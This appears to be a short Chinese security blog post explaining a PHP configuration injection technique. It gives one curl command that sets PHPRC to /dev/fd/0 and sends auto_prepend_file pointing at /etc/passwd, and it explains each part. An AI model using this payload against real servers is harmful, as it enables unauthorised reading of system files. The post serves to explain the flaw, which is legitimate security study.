【网络安全】PHP配置注入漏洞

未经许可,不得转载。

文章目录

正文

前提:通过探测等方式发现某个 PHP 文件存在 PHPRC 参数:

bash 复制代码
curl "https://xxx.com/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

PHPRC 用于指定 PHP 配置文件(php.ini)的路径。通过将其设置为 /dev/fd/0,我们尝试让服务器从标准输入读取 PHP 配置。

--data-binary 参数以二进制格式发送数据,适合传递原始数据而非标准表单参数。

auto_prepend_file 是 PHP 配置选项,可以在执行脚本前自动包含指定文件。这里我们设置为 /etc/passwd,试图读取系统敏感信息。

漏洞证明如下:

相关推荐
辛迪聊物业数字化1 小时前
【智能楼宇系统有什么用?赋能园区高效 节能 安全】
经验分享·安全·微信小程序·php
2401_885885043 小时前
国际语音php接口代码示例:PHP使用cURL快速调用语音发送API
android·开发语言·前端·人工智能·python·php·语音识别
白猫不黑4 小时前
运维如何转安全(个人经验篇)
运维·学习·安全·web安全·网络安全·信息安全
xiaoxiangsiyan5 小时前
网络智能化转型核心模块全解析
运维·服务器·网络·数据库·学习·架构·php
huaweichenai5 小时前
PHP实现对接MQTT协议
开发语言·php
泷泷_6 小时前
CISP-PTE实操题(自写靶场与题类似或变型)
php·文件上传·cisp-pte·cisp·文件包含·sql注入
白猫不黑6 小时前
网络空间安全/信息安全专业学习规划(超级详细版)
运维·学习·安全·web安全·网络安全·信息安全
XR1234567886 小时前
连锁多分支办公网络怎么选?统一运维与快速开局是关键
运维·网络·php
CDN3607 小时前
CDN 加速与网络安全服务解析
安全·web安全
Sagittarius_A*8 小时前
【好靶场】报错注入-sql注入-字符型
数据库·sql·web安全·网络安全·sql注入